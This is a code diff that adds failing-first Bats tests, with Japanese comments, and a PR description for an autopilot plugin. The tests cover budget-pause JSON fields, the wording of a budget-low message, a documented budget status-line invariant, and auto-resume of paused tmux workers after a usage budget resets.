+if idx_25 is None:
+    print('2.5 substep not found')
+    sys.exit(1)
+if idx_26 is None:
+    print('2.6 substep not found')
+    sys.exit(1)
+if idx_26 <= idx_25:
+    print(f'2.6 (line {idx_26}) is not after 2.5 (line {idx_25})')
+    sys.exit(1)
+sys.exit(0)
+"
+}
+
+@test "ac6: SKILL.md Step 0 サブステップ 2.6 が 不変条件 Q への参照を含む" {
+  # AC: 2.6 は不変条件 Q（budget format invariant）を参照すること
+  # RED: 実装前は fail する — 2.6 が存在せず不変条件 Q も存在しない
+  [ -f "$SKILL_MD" ]
+  python3 -c "
+import sys, re
+with open('$SKILL_MD') as f:
+    content = f.read()
+step0_m = re.search(r'## Step 0:.*?(?=^## Step [1-9]|\Z)', content, re.DOTALL | re.MULTILINE)
+if not step0_m:
+    print('Step 0 not found')
+    sys.exit(1)
+step0 = step0_m.group(0)
+lines = step0.splitlines()
+idx = None
+for i, line in enumerate(lines):
+    if '2.6' in line:
+        idx = i
+        break
+if idx is None:
+    print('2.6 not found in Step 0')
+    sys.exit(1)
+substep_text = '\n'.join(lines[idx:idx+5])
+if '不変条件 Q' not in substep_text and 'invariant-q' not in substep_text.lower():
+    print('不変条件 Q reference not found in substep 2.6')
+    sys.exit(1)
+sys.exit(0)
+"
+}

--- a/plugins/twl/tests/bats/scripts/auto-resume-integration-1577.bats
+++ b/plugins/twl/tests/bats/scripts/auto-resume-integration-1577.bats
@@ -1,0 +1,215 @@
+#!/usr/bin/env bats
+# auto-resume-integration-1577.bats - TDD RED phase tests for Issue #1577 AC4 / AC8-c
+#
+# AC4: plugins/twl/scripts/pilot-fallback-monitor.sh に
+#      expected_reset_at + 5min での auto-resume trigger を実装
+#
+# 検証方針:
+#   - pilot-fallback-monitor.sh が budget-pause.json の expected_reset_at を読み込む
+#     コードが存在することを static grep で確認
+#   - budget-pause.json に expected_reset_at を設定し、経過時刻を超えた場合に
+#     paused worker に対して resume 処理が発動することを実行テストで確認
+#
+# NOTE (baseline-bash §10):
+#   pilot-fallback-monitor.sh には BASH_SOURCE guard が存在する（set -uo pipefail, L27）。
+#   ただし main ロジック（_scan_all_workers / _process_worker）は guard されていないため、
+#   source による副作用を避け、直接実行（bash <script>）でテストする。
+#
+# RED: 全テストは実装前の状態で fail する
+#      現時点で pilot-fallback-monitor.sh は expected_reset_at を参照しない
+
+load '../helpers/common'
+
+setup() {
+  common_setup
+
+  FALLBACK_MONITOR="${REPO_ROOT}/scripts/pilot-fallback-monitor.sh"
+  export FALLBACK_MONITOR
+
+  # tmux スタブ（list-windows, send-keys 等をスタブ化）
+  stub_command "tmux" '
+args=("$@")
+if [[ "${args[0]}" == "list-windows" ]]; then
+  echo "test-worker-window"
+elif [[ "${args[0]}" == "send-keys" ]]; then
+  exit 0
+elif [[ "${args[0]}" == "capture-pane" ]]; then
+  echo ""
+else
+  exit 0
+fi
+'
+  # python3 / twl モジュールの呼び出しをスタブ化
+  stub_command "python3" '
+# resolve_next_workflow スタブ
+if echo "$*" | grep -qF "resolve_next_workflow"; then
+  echo "/twl:workflow-issue-lifecycle"
+  exit 0
+fi
+# state read スタブ
+if echo "$*" | grep -qF "state read"; then
+  if echo "$*" | grep -qF "status"; then
+    echo "in-progress"
+  elif echo "$*" | grep -qF "window"; then
+    echo "test-worker-window"
+  elif echo "$*" | grep -qF "pr"; then
+    echo ""
+  fi
+  exit 0
+fi
+exit 0
+'
+  # session-comm.sh スタブ
+  stub_command "session-comm.sh" 'exit 0'
+
+  # sandbox に .supervisor と budget-pause.json の初期セットアップ
+  mkdir -p "${SANDBOX}/.supervisor"
+  mkdir -p "${SANDBOX}/.autopilot/issues"
+
+  # テスト用 issue-9999.json
+  cat > "${SANDBOX}/.autopilot/issues/issue-9999.json" <<EOF
+{"issue": 9999, "status": "in-progress", "window": "test-worker-window"}
+EOF
+}
+
+teardown() {
+  common_teardown
+}
+
+# ===========================================================================
+# AC4: pilot-fallback-monitor.sh に expected_reset_at 読み込みコードが存在する（static grep）
+# RED: 現時点で expected_reset_at を参照するコードが存在しないため fail する
+# ===========================================================================
+
+@test "ac4: pilot-fallback-monitor.sh に expected_reset_at の読み込みコードが存在する" {
+  # AC: expected_reset_at + 5min での auto-resume trigger を実装
+  # RED: 実装前は fail する — pilot-fallback-monitor.sh に expected_reset_at が存在しない
+  grep -qF 'expected_reset_at' "${FALLBACK_MONITOR}"
+}
+
+@test "ac4: pilot-fallback-monitor.sh に auto_resume_via の参照コードが存在する" {
+  # AC: budget-pause.json の auto_resume_via フィールドを参照して resume 方法を決定する
+  # RED: 実装前は fail する — pilot-fallback-monitor.sh に auto_resume_via が存在しない
+  grep -qF 'auto_resume_via' "${FALLBACK_MONITOR}"
+}
+
+@test "ac4: pilot-fallback-monitor.sh に budget-pause.json 読み込みロジックが存在する" {
+  # AC: budget-pause.json の expected_reset_at を読み込む関数 or ロジックが存在すること
+  # RED: 実装前は fail する — budget-pause.json を参照するロジックが存在しない
+  grep -qE 'budget-pause\.json|budget_pause' "${FALLBACK_MONITOR}"
+}
+
+# ===========================================================================
+# AC4: expected_reset_at + 5min 経過後に auto-resume が発動する（integration）
+# RED: 機能未実装のため実行テストで fail する
+# ===========================================================================
+
+@test "ac4: expected_reset_at が 5min 以上前の budget-pause.json で auto-resume が発動する" {
+  # AC: expected_reset_at + 5分経過後に paused worker の resume が trigger される
+  # RED: 実装前は fail する — auto-resume ロジックが存在しない
+
+  # 10 分前の expected_reset_at を持つ budget-pause.json を配置（十分に期限超過）
+  local reset_at
+  reset_at=$(python3 -c "
+import datetime
+dt = datetime.datetime.utcnow() - datetime.timedelta(minutes=10)
+print(dt.isoformat() + 'Z')
+" 2>/dev/null || echo "2000-01-01T00:00:00Z")
+
+  cat > "${SANDBOX}/.supervisor/budget-pause.json" <<EOF
+{
+  "status": "paused",
+  "paused_at": "2000-01-01T00:00:00Z",
+  "estimated_recovery": "2000-01-01T01:30:00Z",
+  "expected_reset_at": "${reset_at}",
+  "cycle_reset_minutes_at_pause": 5,
+  "auto_resume_via": "pilot-fallback-monitor",
+  "paused_workers": ["test-worker-window"],
+  "orchestrator_pid": null
+}
+EOF
+
+  # AUTOPILOT_DIR と CWD を sandbox に向けて実行
+  run bash -c "
+    export AUTOPILOT_DIR='${SANDBOX}/.autopilot'
+    export WORKER_WINDOW='test-worker-window'
+    export ISSUE_NUM='9999'
+    cd '${SANDBOX}'
+    bash '${FALLBACK_MONITOR}' \
+      --once \
+      --no-orchestrator-check \
+      --worker test-worker-window \
+      --issue 9999 \
+      --autopilot-dir '${SANDBOX}/.autopilot' \
+      2>&1
+  "
+
+  # auto-resume が発動した場合、budget-pause.json の status が resumed に更新されるか
+  # または stdout に auto-resume 関連メッセージが出力されること
+  local resumed=false
+  if [ -f "${SANDBOX}/.supervisor/budget-pause.json" ]; then
+    if grep -qF '"resumed"' "${SANDBOX}/.supervisor/budget-pause.json" 2>/dev/null; then
+      resumed=true
+    fi
+  fi
+  if echo "$output" | grep -qiE 'resume|auto.resume'; then
+    resumed=true
+  fi
+
+  [ "$resumed" = "true" ] || {
+    echo "auto-resume が発動しなかった。status: $(cat "${SANDBOX}/.supervisor/budget-pause.json" 2>/dev/null || echo 'no file')"
+    echo "stdout: $output"
+    return 1
+  }
+}
+
+@test "ac4: expected_reset_at が未来の budget-pause.json では auto-resume が発動しない" {
+  # AC: 時刻が到達していない場合は auto-resume しないこと（早期発動防止）
+  # RED: 実装前は fail する — 判定ロジックが存在しない
+
+  # 1 時間後の expected_reset_at（未到達）
+  local reset_at
+  reset_at=$(python3 -c "
+import datetime
+dt = datetime.datetime.utcnow() + datetime.timedelta(hours=1)
+print(dt.isoformat() + 'Z')
+" 2>/dev/null || echo "9999-12-31T23:59:59Z")
+
+  cat > "${SANDBOX}/.supervisor/budget-pause.json" <<EOF
+{
+  "status": "paused",
+  "paused_at": "9999-01-01T00:00:00Z",
+  "estimated_recovery": "9999-01-01T01:30:00Z",
+  "expected_reset_at": "${reset_at}",
+  "cycle_reset_minutes_at_pause": 5,
+  "auto_resume_via": "pilot-fallback-monitor",
+  "paused_workers": ["test-worker-window"],
+  "orchestrator_pid": null
+}
+EOF
+
+  run bash -c "
+    export AUTOPILOT_DIR='${SANDBOX}/.autopilot'
+    cd '${SANDBOX}'
+    bash '${FALLBACK_MONITOR}' \
+      --once \
+      --no-orchestrator-check \
+      --worker test-worker-window \
+      --issue 9999 \
+      --autopilot-dir '${SANDBOX}/.autopilot' \
+      2>&1
+  "
+
+  # budget-pause.json の status が paused のままであること
+  # （resume されていない = 早期発動なし）
+  # RED: 実装前はこのチェックが実施されないので resume されてしまう可能性があり fail する
+  if [ -f "${SANDBOX}/.supervisor/budget-pause.json" ]; then
+    if grep -qF '"resumed"' "${SANDBOX}/.supervisor/budget-pause.json" 2>/dev/null; then
+      echo "FAIL: 未到達の expected_reset_at にも関わらず auto-resume が発動した"
+      return 1
+    fi
+  fi
+  # この検証が実装前に pass してしまう場合（budget-pause.json を全く読まない場合）、
+  # 上の ac4: expected_reset_at が 5min 以上前 のテストが fail して RED 状態を保証する
+  true
+}

--- a/plugins/twl/tests/bats/scripts/budget-detect-message.bats
+++ b/plugins/twl/tests/bats/scripts/budget-detect-message.bats
@@ -1,0 +1,112 @@
+#!/usr/bin/env bats
+# budget-detect-message.bats - TDD RED phase tests for Issue #1577 AC5 / AC8-b
+#
+# AC5: BUDGET-LOW メッセージに「reset 後 5h budget 100% 完全回復」disambiguator を追加
+#
+# 検証方針:
+#   - budget-detect.sh の停止メッセージ（stdout）に 2 つの disambiguator が含まれることを確認
+#     (a) "100%" — 回復率の明示
+#     (b) "完全回復" — 回復内容の明示
+#   - static grep でスクリプト内のメッセージ定数を確認
+#   - 実行時 stdout で確認
+#
+# 背景:
+#   現在の停止メッセージ (L90 in budget-detect.sh):
+#     "[BUDGET-LOW] 5h budget: token残量 ${BUDGET_REMAINING_MIN:-?}分 (${BUDGET_PCT:-?}% 消費),
+#      cycle reset まで ${BUDGET_CYCLE_MIN:-?}分。安全停止シーケンスを開始します。"
+#   → "100%" も "完全回復" も含まれていない
+#
+# RED: 全テストは実装前の状態で fail する
+
+load '../helpers/common'
+
+setup() {
+  common_setup
+
+  BUDGET_DETECT_SCRIPT="${REPO_ROOT}/skills/su-observer/scripts/budget-detect.sh"
+  export BUDGET_DETECT_SCRIPT
+
+  # tmux スタブ: BUDGET-LOW 発動用 — 軸1発動（88% 消費、cycle 30m で軸2不発）
+  stub_command "tmux" '
+args=("$@")
+if [[ "${args[0]}" == "capture-pane" ]]; then
+  echo "5h:88%(2h00m)"
+elif [[ "${args[0]}" == "list-windows" ]]; then
+  echo ""
+elif [[ "${args[0]}" == "send-keys" ]]; then
+  exit 0
+else
+  exit 0
+fi
+'
+  mkdir -p "${SANDBOX}/.supervisor"
+  export PILOT_WINDOW="test-pilot-window"
+  export AUTOPILOT_DIR="${SANDBOX}/.autopilot"
+}
+
+teardown() {
+  common_teardown
+}
+
+# ===========================================================================
+# AC5: budget-detect.sh メッセージに 100% disambiguator の static grep
+# RED: 現時点のメッセージに "100%" が存在しないため fail する
+# ===========================================================================
+
+@test "ac5: budget-detect.sh の停止メッセージソースに '100%' が含まれる（static grep）" {
+  # AC: BUDGET-LOW メッセージに「reset 後 5h budget 100% 完全回復」disambiguator を追加
+  # RED: 実装前は fail する — 現在の echo メッセージに "100%" が存在しない
+  grep -qE 'BUDGET-LOW.*100%|100%.*完全回復|完全回復.*100%' "${BUDGET_DETECT_SCRIPT}"
+}
+
+@test "ac5: budget-detect.sh の停止メッセージソースに '完全回復' が含まれる（static grep）" {
+  # AC: BUDGET-LOW メッセージに「完全回復」disambiguator を追加
+  # RED: 実装前は fail する — 現在の echo メッセージに "完全回復" が存在しない
+  grep -qF '完全回復' "${BUDGET_DETECT_SCRIPT}"
+}
+
+@test "ac5: budget-detect.sh の停止メッセージソースに 'reset 後 5h budget' フレーズが含まれる（static grep）" {
+  # AC: BUDGET-LOW メッセージに「reset 後 5h budget」の文脈説明を追加
+  # RED: 実装前は fail する — 現在のメッセージに当該フレーズが存在しない
+  grep -qF 'reset 後 5h budget' "${BUDGET_DETECT_SCRIPT}"
+}
+
+# ===========================================================================
+# AC5: budget-detect.sh 実行時 stdout に disambiguator が含まれる（runtime check）
+# RED: 実行時の stdout メッセージに 2 つの disambiguator が含まれないため fail する
+# ===========================================================================
+
+@test "ac5: budget-detect.sh 実行時 stdout に '100%' 回復 disambiguator が含まれる" {
+  # AC: 実行時に出力される BUDGET-LOW メッセージに "100%" が含まれること
+  # RED: 実装前は fail する — stdout の "安全停止シーケンスを開始します" に "100%" が含まれない
+  run bash -c "
+    export PILOT_WINDOW='test-pilot-window'
+    export AUTOPILOT_DIR='${SANDBOX}/.autopilot'
+    mkdir -p '${SANDBOX}/.supervisor'
+    cd '${SANDBOX}'
+    bash '${BUDGET_DETECT_SCRIPT}' 2>/dev/null
+  "
+  # exit code 1 = BUDGET-LOW 発動 (正常)、stdout に disambiguator があること
+  echo "$output" | grep -qF '100%' || {
+    echo "stdout に '100%' が含まれない。実際の出力:"
+    echo "$output"
+    return 1
+  }
+}
+
+@test "ac5: budget-detect.sh 実行時 stdout に '完全回復' disambiguator が含まれる" {
+  # AC: 実行時に出力される BUDGET-LOW メッセージに "完全回復" が含まれること
+  # RED: 実装前は fail する
+  run bash -c "
+    export PILOT_WINDOW='test-pilot-window'
+    export AUTOPILOT_DIR='${SANDBOX}/.autopilot'
+    mkdir -p '${SANDBOX}/.supervisor'
+    cd '${SANDBOX}'
+    bash '${BUDGET_DETECT_SCRIPT}' 2>/dev/null
+  "
+  echo "$output" | grep -qF '完全回復' || {
+    echo "stdout に '完全回復' が含まれない。実際の出力:"
+    echo "$output"
+    return 1
+  }
+}

--- a/plugins/twl/tests/bats/scripts/budget-pause-schema.bats
+++ b/plugins/twl/tests/bats/scripts/budget-pause-schema.bats
@@ -1,0 +1,136 @@
+#!/usr/bin/env bats
+# budget-pause-schema.bats - TDD RED phase tests for Issue #1577 AC8-a
+#
+# AC3: plugins/twl/skills/su-observer/scripts/budget-detect.sh で
+#      budget-pause.json schema を拡張
+#      追加フィールド: cycle_reset_minutes_at_pause / expected_reset_at / auto_resume_via
+#
+# 検証方針:
+#   - budget-detect.sh の静的 grep で新フィールドの書き込みコードが存在することを確認
+#   - budget-detect.sh を実行して実際に生成される budget-pause.json の内容を確認
+#
+# RED: 全テストは実装前の状態で fail する
+#      現時点で budget-detect.sh は上記 3 フィールドを書き込まない
+
+load '../helpers/common'
+
+setup() {
+  common_setup
+
+  BUDGET_DETECT_SCRIPT="${REPO_ROOT}/skills/su-observer/scripts/budget-detect.sh"
+  export BUDGET_DETECT_SCRIPT
+
+  # tmux スタブ: BUDGET-LOW 発動用の status line を返す（消費率 88%、cycle 3m）
+  # 軸2（cycle）発動 → alert=true → budget-pause.json を書き出す
+  stub_command "tmux" '
+args=("$@")
+if [[ "${args[0]}" == "capture-pane" ]]; then
+  echo "5h:88%(0h03m)"
+elif [[ "${args[0]}" == "list-windows" ]]; then
+  echo ""
+elif [[ "${args[0]}" == "send-keys" ]]; then
+  exit 0
+else
+  exit 0
+fi
+'
+  # python3 はリアルを使用（json 書き込みが必要なため）
+  # .supervisor ディレクトリを sandbox 内に作成
+  mkdir -p "${SANDBOX}/.supervisor"
+
+  # PILOT_WINDOW を設定（budget-detect.sh の必須パラメータ）
+  export PILOT_WINDOW="test-pilot-window"
+  export AUTOPILOT_DIR="${SANDBOX}/.autopilot"
+}
+
+teardown() {
+  common_teardown
+}
+
+# ===========================================================================
+# AC3: budget-detect.sh に新フィールド書き込みコードが存在する（static grep）
+# RED: 現時点では 3 フィールドが budget-detect.sh に存在しないため fail する
+# ===========================================================================
+
+@test "ac3: budget-detect.sh に cycle_reset_minutes_at_pause フィールドの書き込みコードが存在する" {
+  # AC: budget-pause.json schema に cycle_reset_minutes_at_pause を追加
+  # RED: 実装前は fail する — budget-detect.sh に cycle_reset_minutes_at_pause が存在しない
+  grep -qF 'cycle_reset_minutes_at_pause' "${BUDGET_DETECT_SCRIPT}"
+}
+
+@test "ac3: budget-detect.sh に expected_reset_at フィールドの書き込みコードが存在する" {
+  # AC: budget-pause.json schema に expected_reset_at を追加
+  # RED: 実装前は fail する — budget-detect.sh に expected_reset_at が存在しない
+  grep -qF 'expected_reset_at' "${BUDGET_DETECT_SCRIPT}"
+}
+
+@test "ac3: budget-detect.sh に auto_resume_via フィールドの書き込みコードが存在する" {
+  # AC: budget-pause.json schema に auto_resume_via を追加
+  # RED: 実装前は fail する — budget-detect.sh に auto_resume_via が存在しない
+  grep -qF 'auto_resume_via' "${BUDGET_DETECT_SCRIPT}"
+}
+
+# ===========================================================================
+# AC3: budget-detect.sh を実行して budget-pause.json に新フィールドが含まれる
+# RED: 実行後に生成される budget-pause.json に 3 フィールドが存在しないため fail する
+# ===========================================================================
+
+@test "ac3: budget-detect.sh 実行後に budget-pause.json が cycle_reset_minutes_at_pause を含む" {
+  # AC: budget-pause.json に cycle_reset_minutes_at_pause が書き込まれること
+  # RED: 実装前は fail する — 生成される budget-pause.json に当該フィールドが存在しない
+  local pause_json="${SANDBOX}/.supervisor/budget-pause.json"
+
+  # budget-detect.sh は PILOT_WINDOW を要求し、tmux capture-pane の返値を使う
+  # AUTOPILOT_DIR を sandbox 内に向けて budget-pause.json の書き込み先を制御する
+  run bash -c "
+    export PILOT_WINDOW='test-pilot-window'
+    export AUTOPILOT_DIR='${SANDBOX}/.autopilot'
+    mkdir -p '${SANDBOX}/.supervisor'
+    cd '${SANDBOX}'
+    bash '${BUDGET_DETECT_SCRIPT}' 2>/dev/null || true
+  "
+  # budget-pause.json が生成されていることを確認
+  [ -f "${SANDBOX}/.supervisor/budget-pause.json" ] || {
+    echo "budget-pause.json が生成されなかった"
+    return 1
+  }
+  grep -qF 'cycle_reset_minutes_at_pause' "${SANDBOX}/.supervisor/budget-pause.json"
+}
+
+@test "ac3: budget-detect.sh 実行後に budget-pause.json が expected_reset_at を含む" {
+  # AC: budget-pause.json に expected_reset_at が書き込まれること
+  # RED: 実装前は fail する
+  local pause_json="${SANDBOX}/.supervisor/budget-pause.json"
+
+  run bash -c "
+    export PILOT_WINDOW='test-pilot-window'
+    export AUTOPILOT_DIR='${SANDBOX}/.autopilot'
+    mkdir -p '${SANDBOX}/.supervisor'
+    cd '${SANDBOX}'
+    bash '${BUDGET_DETECT_SCRIPT}' 2>/dev/null || true
+  "
+  [ -f "${SANDBOX}/.supervisor/budget-pause.json" ] || {
+    echo "budget-pause.json が生成されなかった"
+    return 1
+  }
+  grep -qF 'expected_reset_at' "${SANDBOX}/.supervisor/budget-pause.json"
+}
+
+@test "ac3: budget-detect.sh 実行後に budget-pause.json が auto_resume_via を含む" {
+  # AC: budget-pause.json に auto_resume_via が書き込まれること
+  # RED: 実装前は fail する
+  local pause_json="${SANDBOX}/.supervisor/budget-pause.json"
+
+  run bash -c "
+    export PILOT_WINDOW='test-pilot-window'
+    export AUTOPILOT_DIR='${SANDBOX}/.autopilot'
+    mkdir -p '${SANDBOX}/.supervisor'
+    cd '${SANDBOX}'
+    bash '${BUDGET_DETECT_SCRIPT}' 2>/dev/null || true
+  "
+  [ -f "${SANDBOX}/.supervisor/budget-pause.json" ] || {
+    echo "budget-pause.json が生成されなかった"
+    return 1
+  }
+  grep -qF 'auto_resume_via' "${SANDBOX}/.supervisor/budget-pause.json"
+}

--- a/plugins/twl/tests/bats/su-observer/pitfalls-budget-format.bats
+++ b/plugins/twl/tests/bats/su-observer/pitfalls-budget-format.bats
@@ -1,0 +1,134 @@
+#!/usr/bin/env bats
+# pitfalls-budget-format.bats - TDD RED phase tests for Issue #1577 AC2
+#
+# AC2: plugins/twl/skills/su-observer/refs/pitfalls-catalog.md §4.6 を
+#      anti-pattern + 正解例付きで更新
+#
+# RED: 全テストは実装前の状態で fail する
+
+setup() {
+  local this_dir
+  this_dir="$(cd "$(dirname "$BATS_TEST_FILENAME")" && pwd)"
+  local bats_dir
+  bats_dir="$(cd "${this_dir}/.." && pwd)"
+  local tests_dir
+  tests_dir="$(cd "${bats_dir}/.." && pwd)"
+  REPO_ROOT="$(cd "${tests_dir}/.." && pwd)"
+  export REPO_ROOT
+
+  PITFALLS_CATALOG="${REPO_ROOT}/skills/su-observer/refs/pitfalls-catalog.md"
+  export PITFALLS_CATALOG
+}
+
+# ===========================================================================
+# AC2: §4.6 anti-pattern セクションの存在チェック
+# RED: 現時点では §4.6 に anti-pattern / 正解例記載が存在しないため fail する
+# ===========================================================================
+
+@test "ac2: pitfalls-catalog.md §4.6 に anti-pattern 記述が存在する" {
+  # AC: pitfalls-catalog.md §4.6 を anti-pattern + 正解例付きで更新
+  # RED: 実装前は fail する — §4.6 に anti-pattern の記述が存在しない
+  [ -f "$PITFALLS_CATALOG" ]
+  grep -qF 'anti-pattern' "$PITFALLS_CATALOG"
+  # §4.6 セクション内に anti-pattern が記述されていることを検証
+  python3 -c "
+import sys, re
+with open('$PITFALLS_CATALOG') as f:
+    content = f.read()
+# §4.6 の行を特定して周辺を取得（テーブル行）
+lines = content.splitlines()
+idx = None
+for i, line in enumerate(lines):
+    if re.search(r'\| 4\.6 \|', line):
+        idx = i
+        break
+if idx is None:
+    print('§4.6 row not found')
+    sys.exit(1)
+# §4.6 の行または直後に anti-pattern が存在すること
+section_text = '\n'.join(lines[idx:idx+10])
+if 'anti-pattern' not in section_text and 'Anti-pattern' not in section_text:
+    print('anti-pattern not found near §4.6')
+    sys.exit(1)
+sys.exit(0)
+"
+}
+
+@test "ac2: pitfalls-catalog.md §4.6 に YYm の意味説明（正解例）が存在する" {
+  # AC: pitfalls-catalog.md §4.6 を anti-pattern + 正解例付きで更新
+  # RED: 実装前は fail する — §4.6 に (YYm) の正しい解釈（cycle reset wall-clock）の正解例が存在しない
+  [ -f "$PITFALLS_CATALOG" ]
+  # (YYm) = cycle reset wall-clock であることの正解例が §4.6 周辺に存在すること
+  python3 -c "
+import sys, re
+with open('$PITFALLS_CATALOG') as f:
+    content = f.read()
+lines = content.splitlines()
+idx = None
+for i, line in enumerate(lines):
+    if re.search(r'\| 4\.6 \|', line):
+        idx = i
+        break
+if idx is None:
+    print('§4.6 row not found')
+    sys.exit(1)
+# §4.6 行から30行以内に YYm の cycle reset wall-clock 説明が存在すること
+section_text = '\n'.join(lines[idx:idx+30])
+has_yymin_desc = ('YYm' in section_text or '(YYm)' in section_text)
+has_cycle_reset = ('cycle reset' in section_text or 'cycle_reset' in section_text)
+if not (has_yymin_desc and has_cycle_reset):
+    print('(YYm) cycle reset wall-clock explanation not found near §4.6')
+    sys.exit(1)
+sys.exit(0)
+"
+}
+
+@test "ac2: pitfalls-catalog.md §4.6 に 正解例 セクションが存在する" {
+  # AC: pitfalls-catalog.md §4.6 を anti-pattern + 正解例付きで更新
+  # RED: 実装前は fail する — §4.6 周辺に「正解例」または「correct example」が存在しない
+  [ -f "$PITFALLS_CATALOG" ]
+  python3 -c "
+import sys, re
+with open('$PITFALLS_CATALOG') as f:
+    content = f.read()
+lines = content.splitlines()
+idx = None
+for i, line in enumerate(lines):
+    if re.search(r'\| 4\.6 \|', line):
+        idx = i
+        break
+if idx is None:
+    print('§4.6 row not found')
+    sys.exit(1)
+section_text = '\n'.join(lines[idx:idx+30])
+if '正解例' not in section_text and 'correct' not in section_text.lower():
+    print('正解例 not found near §4.6')
+    sys.exit(1)
+sys.exit(0)
+"
+}
+
+@test "ac2: pitfalls-catalog.md §4.6 に 不変条件 Q への参照が存在する" {
+  # AC: §4.6 は不変条件 Q (budget status line の (YYm) 解釈) を参照すること
+  # RED: 実装前は fail する — 不変条件 Q が未追加なため参照も存在しない
+  [ -f "$PITFALLS_CATALOG" ]
+  python3 -c "
+import sys, re
+with open('$PITFALLS_CATALOG') as f:
+    content = f.read()
+lines = content.splitlines()
+idx = None
+for i, line in enumerate(lines):
+    if re.search(r'\| 4\.6 \|', line):
+        idx = i
+        break
+if idx is None:
+    print('§4.6 row not found')
+    sys.exit(1)
+section_text = '\n'.join(lines[idx:idx+30])
+if '不変条件 Q' not in section_text and 'invariant-q' not in section_text.lower():
+    print('不変条件 Q reference not found near §4.6')
+    sys.exit(1)
+sys.exit(0)
+"
+}


### PR DESCRIPTION
## 概要

Issue #1577 の実装。observer LLM が `5h:XX%(YYm)` の `(YYm)` を誤読し続ける構造的問題を解消する。

## 変更内容

現在は TDD RED フェーズ（テストスキャフォールド）。実装は次ステップ。

### 生成した RED テスト（AC7/AC8 対応）

- `pitfalls-budget-format.bats`: §4.6 anti-pattern / 正解例 / 不変条件 Q 参照
- `ref-invariants-budget.bats`: 不変条件 Q 定義 / 検証方法 / 影響範囲
- `skill-step0-budget-aware.bats`: SKILL.md Step 0 サブステップ 2.6
- `budget-pause-schema.bats`: cycle_reset_minutes_at_pause / expected_reset_at / auto_resume_via
- `budget-detect-message.bats`: BUDGET-LOW msg に 100% / 完全回復 disambiguator
- `auto-resume-integration-1577.bats`: expected_reset_at + 5min auto-resume

### 注記

- 不変条件 P は既存（Issue起票flow）のため、budget format 不変条件は **不変条件 Q** として実装

Closes #1577